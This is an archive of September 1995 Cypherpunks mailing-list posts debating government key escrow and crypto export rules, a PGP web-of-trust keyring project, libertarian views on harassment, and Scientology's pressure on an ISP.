>down somewhat, in a very libertarian society oyu might be able to
>run a profatable ISP selling to the very nich market of people who
>want to threten, harass, or generally make a nuicence of themselves).
>

As the list's designated "very libertarian" advocate, I must object.
Here is what you must sign to become a member of the Libertarian Party:

"I hereby certify that I do not believe in or advocate the initiation of
force as a means of achieving political or social goals." Libertarian
Pledge required for membership.
       <signature>___________________________.

To "to threten, harass, or generally make a nuicence"[SIC] of himself,
one must violate this pledge, and there would no-doubt still be legal
results. This points up the difference between libertaria (not utopia)
and anarchy. Anything _DOESN'T_ go in libertaria. If you see a victim,
there's almost certainly a crime, and if someone chose to threaten,
harass, etc. me, I would want it so. Of course, there are exceptions.

For example: If I join a mailing list which sometimes "harasses" me
due to insufficient spell-checking/proof-reading of certain posts,
there might still be the common-law defense that Jim Ray "came to the
nuisance," and therefore I am still not due any compensation.<g>
I can always unsubscribe, and some people probably wish I would. ;)
[NOTE: IANAL!]
JMR
<snip>


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBME8RWm1lp8bpvW01AQHXVgP9GsUelVcy4BFo/qt+Gm2JqdaHOlGUAvnP
eFWXXT7hhzuC5Lz7vdBOb7itNGVahOVmDWPZxAbGJd/sJtd7YAfn4I8uMCiFieXZ
dG7atBLLB66tBcsLYq/gXABHg2Z+MMojTf8A5XXCdqCJl4KoeaVckOEnKjR6uoCE
Q9WrJiykH8Y=
=xdDV
-----END PGP SIGNATURE-----
Regards, Jim Ray

"As sensitive and broad-minded humans, we must never allow ourselves to
be in any way judgmental of the religious practices of other people,
even when these people clearly are raving space loons." -- Dave Barry
------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James M. Ray  <liberty@gate.net>
------------------------------------------------------------------------
Support Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@cmu.edu (Matthew Ghio)
Date: Thu, 7 Sep 95 08:59:59 PDT
To: cypherpunks@toad.com
Subject: Re: Another Son of Clipper discussion paper
In-Reply-To: <v02120d08ac72acec4bb0@[192.0.2.1]>
Message-ID: <m0sqj7T-0012qWC@myriad>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally (m5@dev.tivoli.com) wrote:
: Lucky Green writes:
:  > Windows 95 is on a lot of people's hard drives. It is therefore public
:  > and available for every one's inspection.  How many people do you know
:  > that have reverse engineered Windows 95. How many of those use a
:  > reverse engineered version. I'd venture it is zero out of zero.
:
: Problems with this analogy:
:
: 1) Windows 95 is somewhat bigger than your typical encryption
: routine;
:
: 2) The factor of motivation isn't considered.

If one is motivated enough to want source code to their operating system,
then they are motivated enough to dump Windows and download Linux or BSD.
The only reason to reverse-engineer Windows 95 is to produce applications
which are able to interoperate with Windows software in an unintended
manner, and the only reason to want to do this (instead of writing a
version for an open platform) is because Windows is standard on many PCs.

The same applies to GAK.  There is no reason to hack it when you can just
use PGP instead.  The only reason to hack it would be if it became a
standard.  If we have to start hacking GAK applications, we've already
lost to a degree.  Thus our focus should be on making alternatives
available instead of just attacking GAK.  (Although I suppose you could
show how to hack it, for the sake of making a political statement.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 7 Sep 95 08:50:22 PDT
To: cypherpunks@toad.com
Subject: Re: ON OFF-TOPIC
In-Reply-To: <199509070639.BAA00416@mail.socketis.net>
Message-ID: <9509071545.AA05172@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain




>     THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY!

Of course not, but I don't think that the 1776 result is up for review.

This isn't about crypto nor about the social effects of crypto. Its just another 
looney conspiracy theory.


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 7 Sep 95 09:10:00 PDT
To: cypherpunks@toad.com
Subject: Re: Cybersecurity
In-Reply-To: <199509071329.JAA06512@panix.com>
Message-ID: <9509071605.AA05479@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>It was very much on the side of those seeking privacy, presenting
>the government (even in the UK they are looking at mandatory key escrow, but
>they haven't exactly told British subjects about it) as being underhand,
>sneaking around to find ways of removing the privacy of the individual. 

The UK government looks at many things. Just because the US govt wants to do 
something daft and the UK wants to watch does not mean the UK wants to emulate 
it.

The UK laabour party is opposed to key escrow "we do not accept the "clipper 
chip" argument". The Tories have less than half the level of popular support and 
are barely recognisable as a government.

	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 7 Sep 95 09:17:12 PDT
To: Mac Norton <mnorton@cavern.uark.edu>
Subject: Re: Collection of personal info
Message-ID: <199509071616.MAA04473@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:20 PM 9/6/95 -0500, Mac Norton wrote:
>Well, scratch me deeply enough, I'm not sure I'd disagree 
>with Tim, "philosophically speaking."  The problem is, as
>all the truly wise philosophers recognized, we must live
>in the world.  And given the number of us who must do so,
>that entails rules.

That's what so nice about the nets.  You don't (won't) have to "live in the
world" any more.  The creation of consentual halucinations (virtual worlds)
allows you to "change the world" at will.

And once the interface improves...

Actually, the creation of separate "spaces" that can only be entered with
your (each person's) permission will have a big impact on life in the real
world.   

DCF

"If you don't want TRW to know what you're doing, lie."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Contois <mark@lenox.com>
Date: Thu, 7 Sep 95 09:31:21 PDT
To: bdavis@thepoint.net (Brian Davis)
Subject: Re: GAK
In-Reply-To: <Pine.D-G.3.91.950903212120.8430B-100000@dg.thepoint.net>
Message-ID: <199509071628.MAA07681@tempest.lenox.com>
MIME-Version: 1.0
Content-Type: text


> In other words ... if it took agreement by a review board composed of 
> non-LEA members of this list, would the escrow be acceptable??
> 
> EBD

Speaking for myself only, of course, mandatory key escrow under *any*
circumstances is a Bad Thing.  I don't want anyone to have my secret
key/passphrase, even if 'anyone' consists of n respected cypherpunks.
(How are we supposed to tell whether they're LE, anyway?  I possess
a high degree of confidence, for example, that Tim May is not an
undercover spook.  But that doesn't stop various tentacles^H^H^H^H^H^H^H^H^H
anonymous posters from expressing assertions to the contrary.)

If I *give* my key to an escrow agent, of course, that's a different
story.  ("Mr. Cheatem, in the event of my death or disappearance, please
decrypt this file with the enclosed key and fax it to the Washington
Post.")  But I certainly don't want to allow my key to reside with an
agent who could be forced to turn it over on the basis of a court order.

Sorry if I'm repeating an earlier discussion.

Mark

-- 
Mark Contois * The Lenox Group * Boston, MA * http://www.lenox.com/~mark/
Finger for PGP public key * Stellar Crisis: http://www.lenox.com/games/sc
Cypherpunks: Share and deploy ********* NSA: Go stick your head in a pig.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Thu, 7 Sep 95 19:58:18 PDT
To: cypherpunks@toad.com
Subject: Announce: Web of Trust Ring
Message-ID: <199509071832.MAA00480@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

WEB OF TRUST KEYRING GENERATION PROJECT

I have completed my project to make a condensed version of the keyserver
PGP keyrings, containing only the "web of trust" inter-related keys. My
methods were rather crude, and unfortunately only extracted those people
who have signed someone (already on the list) else's key. That means that
people who are well connected on the web of trust are included, while
those people who only receive signatures from well-connected people are
not included.

The keyfile is approximately 1 megabyte, as opposed to 5-6 in the
keyservers. Building it required 12 successive passes to the MIT keyring,
each requiring 4-6 hours on my poor 386. I also made a subsequent pass
using the UNIMI keyring. To seed the list I used warlord@mit.edu (Uh
Derek? Hello??) and those keynumbers that cpunks mailed me. (Unfortunately
some people sent only their key blocks, which I didn't use. Also, my
server "lost" mail _twice_ due to "disk crash" while I was collecting key
numbers.) I assume that requiring 13 passes means that the longest
possible chain with a single connection (not necessarily a trust
connection) to one of the seed keys is 12 keys. 

All included keys are exactly as they are on keyservers. The keyring
can be trivially validated as much as possibly simply by validating
one of the well-connected keys, like the ones that come with PGP. Warning:
not responsible for assigning trust levels for all those people. That's
your job. Have fun.

Why did I do this:

1) Because I wanted to.
2) Because I really had nothing better to do with my CPU time.
3)

wait, wait, ok for reals:

1) Because I want a web of trust keyring for myself, and that big old
   5+ meg clunker keyfile is tooooo slow to use. 
2) Because I feel that a DNS-style keyserver would not suit many
   web-of-trust activities that I wanted the keyring for, IE: pgp aware
   tools like news and mail readers for on-the-fly validation.
3) Because I feel that a system like this would encourage strengthening
   the web-of-trust, ie, trusting the KEYS. The current system has a 
   lot of disjointed keys (uh, 4 meg worth I guess, eh?) which I found
   myself trusting simply because they were on the Keyservers. While
   this facilitates creation of a stable nym(*), real or not, I found
   myself even trying to justify to others trusting a key simply because
   it was on a keyserver. 

* = I agree with Bill Steward that we are a bit obsessed on True Names(tm)
    bit. I understand when Someone(tm) like Derek Atkins wants to see a
    True Name ID card(tm), but I'm sympathetic to having Nym signing, with
    the problem to overcome being simply the man-in-the-middle thwarting.


Updates:

Currently I am not really planning to do much in the way of updates to
this, unless people actually are interested in updates. To be frank,
this keyring is what I'm dropping into my own PGP, other than that it's
not too exciting. 

If you get a copy, please tell me what you think of the project. The
location is ftp to bert.cs.byu.edu, pub/donring.pgp.  Unfortunately I
don't know if you can tack that together as a ftp:// address. If you do,
try ~ftp/pub/donring.pgp for good measure. 

I have suggested in the past that keyserver software could be modified to
update the web of trust (using a keyfile such as mine for a base) instead
of accepting just any key. I am not capable of making such modifications
to the keyserver program, nor do I know of a keyserver operator who is
willing to run such a system. A "for real" web of trust keyserver would
want to fully expand my keyring by adding what I left out - those keys who
are signed by included keys, but are not themselves included because they
were not a seed and have not signed an included key. Having coded that, an
update system that checks for a relation to a already-included key would
be trivial. 

A second issue is that "The Web" of trust depends on the keys used to seed
it. It's very possible that many of unimi's (for example) key file (500k
bigger than MIT) keys do not have signatures connecting them to the people
who came out with PGP, but have a robust web of trust none the less. 
Unless the project can obtain a seed which connects to that web, none of
it is included. However, as I stated, that is a fact which will 
_encourage_ people to seek each other out for key signing.

I suppose I could also make a list of the keyring generation script, if
anyone actually wanted to ftp it. It would take between 15 and 35 hours to
run on a 386 Linux box such as mine, mere hours on a big, fast box. There
is really no need for it except to regenerate the keyring, for paranoia
purposes or other reasons. 

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBME6dqsLa+QKZS485AQFiBwL/boAb6BOdvcVHVyV+rGRmMTNk8iibcXvX
kdngbRLrBEc2r4pJkuNpDvT2M/GmmGEGYxiAXKV9LDmWa7RLnCicjidP1RJVcu+3
xtVeO9PF+4ZecgEUJl4j6JdPEE52guOr
=nm0W
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 7 Sep 95 09:34:06 PDT
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: not a flame please read and think about this
In-Reply-To: <Pine.SUN.3.91.950907074029.24168A-100000@crl.crl.com>
Message-ID: <199509071633.MAA04493@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Sandy Sandfort writes:
> On Thu, 7 Sep 1995 an116512@anon.penet.fi wrote:
> 
> > why is it that half the people who post here work for the
> > government or big companies that are doing governments bidding
> > (rand.org (which is part of the the nsa!) att.com (makers of the
> > clipper chip) mit (which onwns rsa) netscape etc etc)
> 
> I doubt the statistics and I don't see how mere employment with
> the above somehow disqualifies one for having a regard for 
> privacy.

anonymous idiot doesn't even have his facts right. VLSI and Mykotronix
(sp?) make the EES chips. Rand doesn't do much NSA research (although
there are other companies that do) and MIT doesn't have any real
rights to RSA given the PKP agreements.

In any case, who gives a damn?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Thu, 7 Sep 95 12:51:50 PDT
To: cypherpunks@toad.com
Subject: Commercial Speech over Internet product
Message-ID: <9508078105.AA810503582@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


        Here's an article about a commercial company that is doing speech
over the Internet.  Maybe someone would like to help them add encryption.
                --Bob Baldwin, speaking for myself only.
    ------------------------
TrueSpeech Player enables real-time audio over Internet

SANTA CLARA, CALIFORNIA, U.S.A., 1995 SEP 1 (NB) -- DSP Group Inc. 
(NASDAQ:DSPG) announced a new Windows product, TrueSpeech Player, that is 
freely available on the Internet. The TrueSpeech Player enables TrueSpeech- 
encoded speech to be played in real-time over the Internet.

Kurt Magdanz, director of business development at DSP, told Newsbytes, "The 
TrueSpeech Player utilizes the TrueSpeech compression technology bundled in 
Microsoft's Windows 95 and Windows NT. True Speech is a very high quality 
algorithm which compresses speech. TrueSpeech 
Player allows users to decompress TrueSpeech in real time."

With the TrueSpeech compression algorithm, speech is communicated in real- 
time over standard telephone lines to computers capable of communicating at 
data rates of 14.4kbps (kilobits per second) or above, Newsbytes was told. 
Because the TrueSpeech Player converts compressed speech data in real-time, 
World Wide Web site visitors have access to high-quality speech over the 
Internet in real time, said Magdanz.

"The TrueSpeech Player is our first step in enabling high-quality speech 
communication in real-time over the Internet," said Yuval Cohen, vice 
president of business development with the DSP Group. "World Wide Web site 
and content developers can immediately begin developing TrueSpeech Player- 
compatible content without paying fees."

"Content developers who wish to create TrueSpeech Player-compatible speech 
content should visit our World Wide Web site for detailed instructions on 
how to use this new product," said Cohen.

DSP Group is currently developing an advanced TrueSpeech Server software 
package which will offer content developers tools, interaction with the 
TrueSpeech Player to enable advanced features, live broadcasting capability 
and enhanced server control with diagnostics, said Magdanz.

The TrueSpeech Player can be downloaded freely from DSP Group's World Wide 
Web site, http://www.dspg.com .

DSP is headquartered in Santa Clara, California.

(Richard Bowers/19950831/Press Contact: Kurt Magdanz, DSP, 408- 986-4300)

                





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pfarrell@netcom.com (Pat Farrell)
Date: Thu, 7 Sep 95 13:02:32 PDT
To: trei@process.com
Subject: Re: Notes from NIS&T Key Escrow Export conference.
Message-ID: <199509071959.MAA11919@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>"If keys are escrowed, what purpose does a 64 bit limit serve?"

This question was asked, it seems like a zillion times, but
probably no more than four or five times.

It is a bit of a belt and suspenders idea. But it also shows how
scared they are about real encryption.

It is clear that this meeting is a shame. Everyone in industry
says it won't be marketable. The Govies say it will be great.
What they really want is to force weak crypto on the US by
forcing the vendors to make a weak product "for export" when
all the vendors say that they have to have _only one_ version.
If they have one version, and it is weak, we are safe from
drug dealers, pedophiles and terrorists.

(BTW, I'm used that phrase yesterday, so it should be in the Federal
register's offical record.)

>Secondarily, I observe that this apparently precludes the use of OTP.

No, they don't care about the cipher, only the key length,
But with a 64bit, GAK'd key, you can't say much without repeating
the P, and that makes it a TTP or a FTP (two time pad, or four time pad)
which isn't very useful.  You probably can gzip "attack at dawn" to
64 bits, but not much more.

Pat

Pat Farrell      grad student        http://www.isse.gmu.edu/students/pfarrellA
Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
PGP key available via finger or request           #include standard.disclaimer
Z~v
:$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Thu, 7 Sep 95 13:10:00 PDT
To: cypherpunks@toad.com
Subject: Re: GAK
Message-ID: <v02120d18ac750fc7697b@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



One good (non-cypherpunk) argument against GAK is that it
concentrates a very large quantity of valuable keys in a few
places, where they become an extremely attractive target for
government or corporate espionage.

You could compare this to the function served by banks, but
banks tend to notice fairly quickly when money is missing.
Compromising keys doesn't involve removing anything, or throw
the books out of balance; they just get copied. The compromise
is only revealed if they are used clumsily.

Note that a few million keys would fit very easily on even a
low-end DAT tape (easily hidden in a pack of cigarettes).











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Thu, 7 Sep 95 10:27:48 PDT
To: Jim Ray <liberty@gate.net>
Subject: Re: ECPA (Was: University logging mail to anon.penet.fi)
In-Reply-To: <199509071535.LAA49458@tequesta.gate.net>
Message-ID: <Pine.SUN.3.91.950907132341.7591B-100000@pipa.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Sep 1995, Jim Ray wrote:

> >Even if we were in a more libertarian society you run the risk of
> >being boycotted by potential customers (of corse the analagy breaks
> >down somewhat, in a very libertarian society oyu might be able to
> >run a profatable ISP selling to the very nich market of people who
> >want to threten, harass, or generally make a nuicence of themselves).

> To "to threten, harass, or generally make a nuicence"[SIC] of himself,
> one must violate this pledge, and there would no-doubt still be legal
> results.

Clearly threats of violence are not considered legal by most 
libertarians, including the Libertarian Party of the US. 

Furthermore, there is no reason why an ISP has to connect to another 
ISP.  ISPs that do more harm than good may not be invitied to participate 
in major switiching centers.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: duncan@hasp.com (Duncan J Watson)
Date: Thu, 7 Sep 95 10:29:21 PDT
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: GAK
In-Reply-To: <Pine.D-G.3.91.950903212120.8430B-100000@dg.thepoint.net>
Message-ID: <9509071332.ZM124@titan.hasp.com>
MIME-Version: 1.0
Content-Type: text/plain


Brian,

Your question is very hard to answer as poised.  How is access granted?  To 
whom?  In what period of time?, etc.

The details are very important here as this is a very detail-oriented list.  
Also the details of implementation are where you may find the objections.  
Many plans sound grand when loosely described but fail due to small details.

My personal belief is that any mandatory key escrow system will be open to 
abuse by authority figures.  A solidly implemented key escrow service operated 
by smart privacy oriented private firms would have benifit corperations and 
others engaged in cooperative development or other cooperative operations.  
Key escrow would keep the accountants and lawyers happy.  

Just my $0.02.
djw

On Sep 3,  9:25pm, Brian Davis wrote:
> Subject: Re: GAK
[stuff deleted]
> I, of course, know of the "dislike" of GAK here.  I am curious to know, 
> however, if the "dislike" is because government would have access under 
> any circumstances or if the primary worry is that government will cheat 
> and get access when most would agree that they shouldn't (either by the 
> judge "cheating" or a TLA stealing it).
> 
> In other words ... if it took agreement by a review board composed of 
> non-LEA members of this list, would the escrow be acceptable??
> 
> EBD
> 
>-- End of excerpt from Brian Davis



-- 
Duncan J Watson                            Email:Duncan@hasp.com
Tech Support Manager/Sys Admin             Ph#:  +1 212 564 5678
Aladdin Software Security Inc              Fax#: +1 212 564 3377
:::finger Duncan@hasp.com for PGP key:::   http://www.aks.com/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Thu, 7 Sep 95 12:12:59 PDT
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: GAK
In-Reply-To: <Pine.D-G.3.91.950903212120.8430B-100000@dg.thepoint.net>
Message-ID: <Pine.SUN.3.91.950907135630.13108A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Sep 1995, Brian Davis wrote:

> I, of course, know of the "dislike" of GAK here.  I am curious to know, 
> however, if the "dislike" is because government would have access under 
> any circumstances or if the primary worry is that government will cheat 
> and get access when most would agree that they shouldn't (either by the 
> judge "cheating" or a TLA stealing it).

...or "somebody else" (ie commercial competitor, personal or political 
rival, etc) paying off somebody to obtain it.  I don't trust the gvm't to 
only get access when they should, either.

> In other words ... if it took agreement by a review board composed of 
> non-LEA members of this list, would the escrow be acceptable??

Not necessarily; the members of the review board can be bribed, 
blackmailed, lied to, etc.  I don't believe there's a competent review 
board available...nor do I think such a thing could be created.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Thu, 7 Sep 95 21:47:47 PDT
To: cypherpunks@toad.com
Subject: Ring: Server problem
Message-ID: <199509072022.OAA00701@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

AAAAAAAAAAAKKKKKKKKK

My server has had problems with both incoming ftp and rz. Not only is it
very flakey, but they've mis-applied a timeout lately, meaning I have to
press a key every 10 minutes during ftp or the process gets killed. Oh,
and they did that just before becoming very busy.

I delayed announcing my keyring until I could physically transfer the
keyring by disk. After getting mail reporting it being corrupted, I had
to delete it. It's possible that when I mounted my disk, it could have
defaulted into an ascii conversion. I am currently trying to uuencode
the entire file and mail it to myself from my local machine. (Heh)

If that fails, the keyring will unfortunately not be available until
tomorrow, when I can physically transfer it.

Sorry for the delay.

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBME9UYcLa+QKZS485AQFiAAL/bOEgCAeQVPfIzaU3fbRzowK+Wh+lwgaY
TY/O9DssheM34qbQcaM3qx9/7Gv4J+kamvhNOgNPhInsQ9ZATKFFtfbPTKimH/jm
dP6g51WxbhdQV6mUdXoPT1z1yFAUPEiL
=HaPy
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com
Date: Thu, 7 Sep 95 11:46:16 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Collection of personal info
In-Reply-To: <199509071616.MAA04473@panix.com>
Message-ID: <Pine.SUN.3.91.950907142506.26768A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Sep 1995, Duncan Frissell wrote:

> That's what so nice about the nets.  You don't (won't) have to "live in the
> world" any more.  The creation of consentual halucinations (virtual worlds)
> allows you to "change the world" at will.

Goody.  In this virtual world, we can also abolish all taxes, remove
all restrictions on crypto use, or even get rid of the government
altogether.  I just hope I can find enough food there.

> And once the interface improves...

...I won't have to deal with the inefficiencies of real sex, live
music performances, or (non-virtual) world travel ever again.

> Actually, the creation of separate "spaces" that can only be entered with
> your (each person's) permission will have a big impact on life in the real
> world.   

Yeah, it'll wipe it out.

I've got to tell you, Duncan, this kind of rhetoric pushes me over to
the luddite side more every day.

No flame intended--just one man's opinion.

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Fabbri <tomservo@access.digex.net>
Date: Thu, 7 Sep 95 11:48:09 PDT
To: cypherpunks@toad.com
Subject: Re: Force Ratios
Message-ID: <199509071847.OAA08292@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> But the most interesting thing that this emphasized for me was the sort of
> modern information warfare issues as highlighted in the recent Economist
> Survey.  Info war is war by other means (a little shooting, communications,
> publicity, and litigation) and look what happened at Ruby Ridge.  The Feds
> deployed 400 "troopies", some armored personnel carriers, copters, executive
> jets, Hummers, and other hardware.  On the other side were 3 adults and 4
> children with some 14 personal weapons.
> 
> The result.  One Fed and two Weavers dead.  A $3.1 million legal settlement,
> and continuing problems for the Feds.  That smells like a bad defeat to me.
> They couldn't even kill 7 people with a 57 to 1 force ratio.

Well. I think if killing the Weaver clan was the primary objective, they
could have been much more direct. One plane, one bomb/missile, one pilot,
with a 1:7 force ratio (1:2 if you don't count probable noncombatants). Or
a SEAL team with tools to make it look like an "accident" (carbon
monoxide, maybe? A propane explosion?). However, we generally frown on
that kind of thing in our polite society. :-)

If the Feds had really wanted to kill the Weavers, it'd probably be called
"Ruby Crater" now. 

> In addition, the operation and the various investigations must have cost the
> Feds millions more.  (What *do* the Fibbies have to pay for those Ninja
> Hoods?)  And they lost.

Murphy's Law applies everywhere. Most likely they really wanted to take
Weaver and clan alive (and thought they could!), and the worst possible
things happened. (Surprisingly enough, government TLAs know all about the
concept of "bad press," and killing bystanders isn't SOP.)

> That suggests that the ability of The Great Enemy to overcome the sort of
> directed human activity of the frictionless markets we are building will be
> quite limited.

But they don't have to face you directly, just convince someone who
allegedly represents you that a "law" is necessary to "save you from
yourself" and to "keep our great country free and safe." Then you either
play ball, or you wind up with a bunch of balaclava-clad guys in your
bedroom one night, taking your computer and dragging you off. Maybe they 
don't get anything to convict you, but you still have to mount a costly 
defense.

What a great system, eh? Just like the Founding Fathers imagined.
- -- 
Scott Fabbri              MSTie #31643       tomservo@access.digex.net
"If I knew that a man was coming to my house with the conscious design
of doing me good, I should run for my life."  --Thoreau

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQB1AwUBME898OvEnOI8TfM9AQFLJQL9GV7+YWfPUtBKaF7qbny4KLz7DhxkSrEE
TIhCVRiDmuoSnqsUFpM4i4yDQqEJK5lOnxm7mwYyPrKku8Z1JB7SPG5Koq/Vt/QZ
UwOnYT0VRNydJVQpIWq7AgnBmIz2wRYe
=uMqt
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 7 Sep 95 12:24:56 PDT
To: cypherpunks@toad.com
Subject: Industry Slams Gov's Encryption Export Plan
Message-ID: <v02120d06ac74f2a3e1ad@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Mime-Version: 1.0
Date: Thu, 07 Sep 1995 07:15:48
From: James Rapp <infocker@megaweb.com>
To: www-buyinfo@allegra.att.com, rpournel@hr.house.gov
Subject: Industry Slams Gov's Encryption Export Plan

I was at the 9/6 NIST session and this account is reasonably
accurate.  Even though a seemingly high percentage of
attendees indicated displeasure with current Administration
key escrow proposals, they seem hell bent on this path.
Further, the sense was that industry representatives were
basically invited as a simple window dressing maneuver.

The engaging Whitfield Diffie of Sun Microsystems did an
outstanding job of raising questions about the
Administration's proposal.

Today's session--"Desirable Characteristics for Key Escrow
Agents."


Jim Rapp, "give me more info"
CyberStrategies
Alexandria, Virginia



Via Newsbytes, Kennedy Maize 9/6/95 12:00 a.m.


WASHINGTON, D.C., -- The Clinton administration's new proposal
on export controls onencryption in software got a tongue
lashing from the software industry today. The administration's
announcement of a so-called liberalization "suggests that the
government is pursuing a 'son of Clipper' strategy that could
lead to the mandatory use of government designed key escrow
encryption," said Robert Holleyman, president of the Business
Software Alliance.

Speaking at a conference sponsored by the National Institute
of Standards and Technology, Holleyman said the administration
plan to allow export only if the encryption scheme involves
key escrow reveals "a misunderstanding of the marketplace and
unless significantly changed, will prevent key escrow
encryption from ever being commercially adopted."

The White House initiative, Holleyman said, "failed to provide
immediate relief to software companies because it did nothing
to liberalize export controls on generally available software
employing non-key escrow encryption.

"Each delay by the administration in permitting the export of
software with strong encryption capabilities results in lost
sales for American companies," said Holleyman. "Ironically,
foreign software competitors, unconstrained by export
controls, continue to fill this void, with more than
200 foreign encryption programs available from 21 countries."

Under the new administration proposal, software companies that
employ non-key escrow encryption would continue to be limited
to a 40-bit key. Holleyman called for the administration
to immediately permit 56-bit encryption without key escrow,
which he said is the current world
standard.

Last year, the administration was pushing a hardware-software
approach to encryption, called the Clipper chip, which would
have employed government-designated escrow agents to hold
keys. Law enforcement agencies would have been able to get
access to the keys from the escrow agents.

Of the administration proposal to loosen controls on key
escrow encryption, Holleyman said that "the administration's
inability to shake off the Clipper mind-set is effectively
precluding the adoption of realistic criteria for commercial
key recovery systems." Holleyman suggested that a
workable system must include strong encryption where users --
in the US and elsewhere -- are able to specify the key holder.

Current administration policy, Holleyman said, is jeopardizing
the "future of the global information infrastructure and
electronic commerce. Instead of paving the roads, the
administration has left in place roadblocks on the information
highway."

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@cs.monash.edu.au>
Date: Wed, 6 Sep 95 23:03:18 PDT
To: rjc@clark.net (Ray Cromwell)
Subject: Re: Scientology and police visit XS4ALL Amsterdam
In-Reply-To: <199509070346.XAA14571@clark.net>
Message-ID: <199509070600.QAA11675@molly.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Ray Cromwell and all other cypherpunks,

> Anyone ready to risk running a "Scientology .sig virus server"?
...
> In the same spirit of the "export-a-sig-PGP" system, why not break
> the CoS materials up into n pieces (each piece being 5-10 lines long)
...

I don't really follow the Co$ saga, but when I last looked it seemed
as though six lines (one of them the title) are sufficient for them
to be unhappy at you. If I remember correctly, those six lines said
to go to the zoo to practice telepathy with animals...

(No they didn't say *how*.)

So I don't know whether the "export-PGP-sig" system will be any use.

...
> To spread the risk around even more, I'd place the "piece server"
> on k different HTTP sites just so they can't raid them all. Even
> better would be to use a script on one master server to
...

master server = single point of pressure

> Cypherpunks oughta be able to figure out something to show those idiots
> why their actions are ultimately futile.

It always was, but do you have the money and the spirit to fight them?


Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
